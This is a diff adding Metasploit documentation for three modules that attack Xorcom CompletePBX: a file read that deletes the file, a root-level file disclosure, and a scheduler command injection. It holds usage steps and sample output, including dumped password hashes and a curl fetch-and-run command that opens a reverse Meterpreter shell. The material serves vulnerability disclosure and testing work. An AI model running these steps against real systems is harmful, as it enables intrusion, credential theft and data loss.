rapid7
diff --git a/‎documentation/modules/auxiliary/scanner/http/xorcom_completepbx_diagnostics_file_read.md
Lines changed: 142 additions & 0 deletions b/‎documentation/modules/auxiliary/scanner/http/xorcom_completepbx_diagnostics_file_read.md
Lines changed: 142 additions & 0 deletions
diff --git a/‎documentation/modules/auxiliary/scanner/http/xorcom_completepbx_file_disclosure.md
Lines changed: 112 additions & 0 deletions b/‎documentation/modules/auxiliary/scanner/http/xorcom_completepbx_file_disclosure.md
Lines changed: 112 additions & 0 deletions
diff --git a/‎documentation/modules/exploit/linux/http/xorcom_completepbx_scheduler.md
Lines changed: 108 additions & 0 deletions b/‎documentation/modules/exploit/linux/http/xorcom_completepbx_scheduler.md
Lines changed: 108 additions & 0 deletions
@@ -0,0 +1,142 @@
+## Vulnerable Application
+
+This Metasploit module exploits an **Authenticated Arbitrary File Read and Deletion** vulnerability in **Xorcom CompletePBX <= 5.2.35**.
+The issue arises due to improper validation of the `systemDataFileName` parameter in the `diagnostics` module,
+allowing an attacker to retrieve arbitrary files from the system.
+
+Additionally, this vulnerability **automatically deletes the requested file** after being accessed,
+leading to potential data loss on the target.
+
+The vulnerability is identified as **CVE-2025-30005**.
+
+### Setup
+
+Download the ova file here: [](https://archive.org/details/completepbx-5-2-27-vuln)
+
+## Verification Steps
+
+1. Deploy a vulnerable instance of **Xorcom CompletePBX <= 5.2.35**.
+2. Launch **Metasploit Framework**.
+3. Use the module:
+```
+use auxiliary/admin/http/xorcom_completepbx_diagnostics_file_read
+```
+4. Set the **target host**:
+```
+set RHOSTS [TARGET_IP]
+```
+5. Set authentication credentials:
+```
+set USERNAME [VALID_ADMIN_USERNAME]
+set PASSWORD [VALID_ADMIN_PASSWORD]
+```
+6. Specify the file to read (before deletion):
+```
+set TARGETFILE /etc/passwd
+```
+7. Execute the module:
+```
+run
+```
+8. If successful, the contents of the specified file will be displayed before its deletion.
+
+## Options
+
+### USERNAME
+
+Admin username for authentication.
+
+### PASSWORD
+
+Admin password for authentication.
+
+### TARGETFILE
+
+Path of the file to retrieve (**before automatic deletion**).
+
+### DefangedMode
+
+Safety switch (true by default). Set to **false** to actually perform the read-and-delete operation.
+
+## Scenarios
+
+### Successful Exploitation Against a Vulnerable CompletePBX Instance
+
+**Setup**:
+
+- **Target**: Xorcom CompletePBX <= 5.2.35
+- **Attacker**: Metasploit Framework instance
+
+**Steps**:
+
+```bash
+msf6 auxiliary(scanner/http/xorcom_completepbx_diagnostics_file_read) > run http://192.168.1.32/
+[*] Running module against 192.168.1.32
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[-] Auxiliary aborted due to failure: bad-config: 
+Are you *SURE* you want to execute the module against the target?
+Running this module will attempt to read and delete the file
+specified by TARGETFILE on the remote system.
+
+If you have explicit authorisation, re-run with:
+    set DefangedMode false
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/xorcom_completepbx_diagnostics_file_read) > set DefangedMode false
+DefangedMode => false
+msf6 auxiliary(scanner/http/xorcom_completepbx_diagnostics_file_read) > run http://192.168.1.32/
+[*] Running module against 192.168.1.32
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[!] This exploit WILL delete the target file if permissions allow.
+[*] Attempting to read file: ../../../../../../../../../../..//etc/passwd
+[*] ZIP file received, attempting to list files
+[*] Files inside ZIP archive:
+ - ../../../../../../../../../../..//etc/passwd
+ - full_20250716_191240
+ - audit_20250716_191240.log
+[+] Content of /etc/passwd:
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
+messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
+avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
+pbx:x:1000:1000:,,,:/home/pbx:/bin/bash
+mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
+postfix:x:104:113::/var/spool/postfix:/usr/sbin/nologin
+tcpdump:x:105:115::/nonexistent:/usr/sbin/nologin
+Debian-snmp:x:106:116::/var/lib/snmp:/bin/false
+_chrony:x:107:117:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
+dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin
+asterisk:x:109:118:Asterisk PBX daemon,,,:/var/lib/asterisk:/usr/sbin/nologin
+cc-cloud-rec:x:999:995::/var/lib/cc-cloud-rec:/sbin/nologin
+
+[*] Auxiliary module execution completed
+```
+
+### Impact
+
+- This vulnerability grants **file read access**, but also **automatically deletes** the retrieved file.
+- Attackers can extract sensitive data (e.g., user credentials) while simultaneously causing **data loss** on the system.
+
+This module is designed to **demonstrate and automate** the exploitation of this issue using the Metasploit framework.
@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+This Metasploit module exploits an **Authenticated File Disclosure** vulnerability in **Xorcom CompletePBX <= 5.2.35**.
+The issue arises due to improper handling of user-supplied input
+in the **core download functionality**, allowing an attacker to read arbitrary files on the system with **root privileges**.
+
+### Setup
+
+Download the ova file here: [](https://archive.org/details/completepbx-5-2-27-vuln)
+
+## Verification Steps
+
+1. Deploy a vulnerable instance of **Xorcom CompletePBX <= 5.2.35**.
+2. Launch **Metasploit Framework**.
+3. Use the module:
+```
+use auxiliary/admin/http/xorcom_completepbx_file_disclosure
+```
+4. Set the **target host**:
+```
+set RHOSTS [TARGET_IP]
+```
+5. Set authentication credentials:
+```
+set USERNAME [VALID_ADMIN_USERNAME]
+set PASSWORD [VALID_ADMIN_PASSWORD]
+```
+6. Specify the file to read:
+```
+set TARGETFILE /etc/shadow
+```
+7. Execute the module:
+```
+run
+```
+8. If successful, the contents of the specified file will be displayed.
+
+## Options
+
+### USERNAME
+
+Admin username for authentication.
+
+### PASSWORD`
+
+Admin password for authentication.
+
+### TARGETFILE
+
+Path of the file to retrieve (Base64-encoded in request).
+
+## Scenarios
+
+### Successful Exploitation Against a Vulnerable CompletePBX Instance
+
+**Setup**:
+
+- **Target**: Xorcom CompletePBX <= 5.2.35
+- **Attacker**: Metasploit Framework instance
+
+**Steps**:
+
+```bash
+msf6 auxiliary(scanner/http/xorcom_completepbx_file_disclosure) > run http://192.168.1.32/
+[*] Running module against 192.168.1.32
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Attempting to read file: /etc/shadow (Encoded as: ,L2V0Yy9zaGFkb3c=)
+[+] Content of /etc/shadow:
+root:$y$j9T$/vXScZij/ykAtLtP9H1nQ/$KK43hfpOrxdZwAZljjvS5dnF0ipg8NqpCOj9gbLJ9OA:19829:0:99999:7:::
+daemon:*:19829:0:99999:7:::
+bin:*:19829:0:99999:7:::
+sys:*:19829:0:99999:7:::
+sync:*:19829:0:99999:7:::
+games:*:19829:0:99999:7:::
+man:*:19829:0:99999:7:::
+lp:*:19829:0:99999:7:::
+mail:*:19829:0:99999:7:::
+news:*:19829:0:99999:7:::
+uucp:*:19829:0:99999:7:::
+proxy:*:19829:0:99999:7:::
+www-data:*:19829:0:99999:7:::
+backup:*:19829:0:99999:7:::
+list:*:19829:0:99999:7:::
+irc:*:19829:0:99999:7:::
+_apt:*:19829:0:99999:7:::
+nobody:*:19829:0:99999:7:::
+systemd-network:!*:19829::::::
+systemd-timesync:!*:19829::::::
+messagebus:!:19829::::::
+avahi-autoipd:!:19829::::::
+sshd:!:19829::::::
+pbx:$y$j9T$u6FpdD4iJVvFEqtUSAoFP/$P5iBn5ljpYEwcuXj4F9n6SBlMgWyxjqBDK82ija9Te5:19829:0:99999:7:::
+mysql:!:19829::::::
+postfix:!:19829::::::
+tcpdump:!:19829::::::
+Debian-snmp:!:19829::::::
+_chrony:!:19829::::::
+dnsmasq:!:19829::::::
+polkitd:!*:19829::::::
+asterisk:!:19829::::::
+cc-cloud-rec:!:19829::::::
+[*] Auxiliary module execution completed
+```
+
+### Impact
+
+- This vulnerability grants **full read access to system files as root**.
+- Attackers can retrieve **hashed passwords, SSH keys, and configuration files**,
+leading to **privilege escalation** and potential full system compromise.
+
+This module is designed to **demonstrate and automate** the exploitation of this issue using the Metasploit framework.
@@ -0,0 +1,108 @@
+## Vulnerable Application
+
+This Metasploit module exploits an **Authenticated Command Injection** vulnerability in **Xorcom CompletePBX <= 5.2.35**.
+The issue resides in the task scheduler functionality, where user-controlled input is improperly sanitized, allowing
+arbitrary command execution with web server privileges.
+
+Only the **superadmin** user (`admin`) has the necessary permissions to trigger this exploit.
+Even when creating a new user with maximum privileges, the vulnerability does not work.
+
+The vulnerability is identified as **CVE-2025-30004**.
+
+### Setup
+
+Download the ova file here: [](https://archive.org/details/completepbx-5-2-27-vuln)
+
+## Verification Steps
+
+1. Deploy a vulnerable instance of **Xorcom CompletePBX <= 5.2.35**.
+2. Launch **Metasploit Framework**.
+3. Use the module:
+```
+use exploit/linux/http/xorcom_completepbx_scheduler_rce
+```
+4. Set the **target host**:
+```
+set RHOSTS [TARGET_IP]
+```
+5. Set authentication credentials:
+```
+set USERNAME [VALID_ADMIN_USERNAME]
+set PASSWORD [VALID_ADMIN_PASSWORD]
+```
+6. Configure the payload:
+```
+set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+set LHOST [ATTACKER_IP]
+set LPORT [LISTENER_PORT]
+```
+7. Execute the module:
+```
+run
+```
+8. If successful, a **Meterpreter session** will be opened on the target.
+
+## Options
+
+### USERNAME
+
+Admin username for authentication.
+
+### PASSWORD
+
+Admin password for authentication.
+
+## Scenarios
+
+### Successful Exploitation Against a Vulnerable CompletePBX Instance
+
+**Setup**:
+
+- **Target**: Xorcom CompletePBX <= 5.2.35
+- **Attacker**: Metasploit Framework instance
+
+**Steps**:
+
+```bash
+msf6 exploit(linux/http/xorcom_completepbx_scheduler) > run http://192.168.1.32/
+[*] Command to run on remote host: curl -so ./HEuUpqtYDav http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA;chmod +x ./HEuUpqtYDav;./HEuUpqtYDav&
+[*] Fetch handler listening on 192.168.1.36:8080
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if the target is running CompletePBX...
+[+] Detected CompletePBX on 192.168.1.32:80
+[+] The target appears to be vulnerable.
+[*] Attempting authentication with username: admin
+[+] Authentication successful! Session ID: sid=697e43b483efc1ac316461cde1fbb5d470abc3b4
+[*] Creating malicious scheduled task with description: Possimus quibusdam assumenda minima.
+[+] Malicious task successfully created.
+[*] Retrieving latest task ID for description: Possimus quibusdam assumenda minima....
+[+] Found task with ID: 18
+[*] Executing malicious task ID 18...
+[*] Client 192.168.1.32 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 192.168.1.32 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.1.32
+[+] Task executed successfully!
+[*] Sending delete request (mode=delete) for task ID 18...
+[*] Sending delete request (mode=deleteConfirmed) for task ID 18...
+[+] Task 18 deleted successfully!
+[*] Meterpreter session 6 opened (192.168.1.36:4444 -> 192.168.1.32:40800) at 2025-07-16 21:11:31 +0200
+
+meterpreter > sysinfo 
+Computer     : localhost.localdomain
+OS           : Debian 12.5 (Linux 6.1.0-20-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Impact
+
+- This vulnerability grants **remote code execution** capabilities.
+- Attackers can execute arbitrary commands as the **web server user**, potentially leading to full system compromise.
+- Exploitation provides a **Meterpreter session** for post-exploitation activities.
+
+This module is designed to **demonstrate and automate** the exploitation of this issue using the Metasploit framework.